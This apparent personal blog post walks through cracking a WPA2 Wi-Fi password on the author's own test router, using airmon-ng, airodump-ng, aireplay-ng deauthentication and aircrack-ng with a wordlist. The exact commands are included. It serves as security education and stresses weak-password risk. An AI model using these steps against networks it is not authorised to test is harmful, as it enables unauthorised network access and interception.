Wireless Hacking – WPA2

I’m pretty sure there’s a million blog posts and videos online about how to hack a wireless access point with WPA2 encryption. I guess this is more of a reference point for me to go back to whenever I need it as much as it may help others.

WPA2 is about as secure as the password you use. If your passcode is stored in any wordlist, you are going to get owned. My test router did not log this attack and my Android tablet (client) simply disconnected and reconnected quicker than I could measure.

The kit

Wireless card: ALFA AWUS036H 5db
Access Point: Linksys WRT54GC

The theory

  • Identify your wireless card
  • Place the card into monitor mode
  • Identify the Access Point target and connected client(s)
  • Launch a De-Authentication attack on the client
  • Grab the WPA handshake
  • Crack the pass code using Aircrack-NG and a wordlist

The hack

First up we need to identify the wireless card. Run the command below:

airmon-ng

I know from previous identification that the ALFA card uses the rtl8187 driver so I’m looking to use wlan1 for this test. From the identification of the wireless card, the next step is to place this card in monitor mode. In one command we can check for rogue services and kill them while placing the card into monitor mode.

 

airmon-ng check kill && airmon-ng start wlan1

As we can see from the image below, there is a new interface called ‘wlan1mon’ – There is an easier way to create a new interface for monitoring, however, I wanted to keep it within the Aircrack-NG suite for ease of reading.

Now that we have an interface where we can monitor wireless traffic, we can now move to identifying a target. I’ll be using the test access point from above and the SSID is called ‘linksys’

airodump-ng wlan1mon

If you run this command above you will see all the available access points that are within range of the ALFA card. I’ll skip to the next command where we zone in on the test router to gain more information about it.

airodump-ng -c 6 –bssid 00:0F:66:86:85:3A wlan1mon

All we have done is target the access point MAC address and channel. This will show the connected clients and also when you write the captured traffic to the file later, you won’t create a big file.

As you can see, we are targeting the ESSID ‘linksys’. The information we need for the next phase is the access point BSSID (MAC Address) and a MAC address of a client (Station). I’ve connected my Android tablet to the target network so that we can create some traffic and have something to attack later.

By simply unlocking the tablet, it becomes associated with the access point once again and shows up during the monitoring phase. Now we have more information, the next phase of attack can be processed.

Before the next phase it run, we need to capture the recovered packets in a file to crack later. Adding a flag (-w) in the above airodump command will allow us to capture the traffic.

airodump-ng -c 6 –bssid 00:0F:66:86:85:3A -w hacked wlan1mon

Running this before this next command in a new window is important.

In a new terminal window we run the command below to deauth the client (tablet) from the access point so that it is forced to reconnect and we capture the WPA handshake.

aireplay-ng –deauth 5 -a 00:0F:66:86:85:3A -c 38:2C:4A:37:91:13 wlan1mon

Aireplay-NG is a very powerful tool in the Aircrack suite. it has many functions that are worth investigating. For this exercise we send 5 deauth packets to the client to force it to reconnect to the wireless network.

Amazingly, before you know it, you have captured a WPA handshake in the Airodump terminal window with the confirmation shown in the window below.

This is the point where most tutorial videos neglect to tell you to keep the Airodump scan running. I spent too long on troubleshooting why Aircrack reported why it didn’t have a WPA handshake to work with.

In another terminal window run the below command:

aircrack-ng -w rockyou.txt hacked-01.cap

For the purposes of this tutorial I set the wireless password to password123. In an amazing amount of time, aircrack-ng has cracked the password in around 1 second. It obviously helps that it’s a super common password in any wordlist, however, it does show how dangerous it can be to use weak passwords.

Capturing a WPA handshake is really easy, however, the strength of the password is one of the biggest defenses against this type of attack. I’m sure wordlists exist out in the wild for certain wireless routers. I’m keen to explore this method purely because this is such an interesting field.

If you have any questions or improvements on this type of attack, hit me up on twitter @InfoSecPS

Thanks for reading.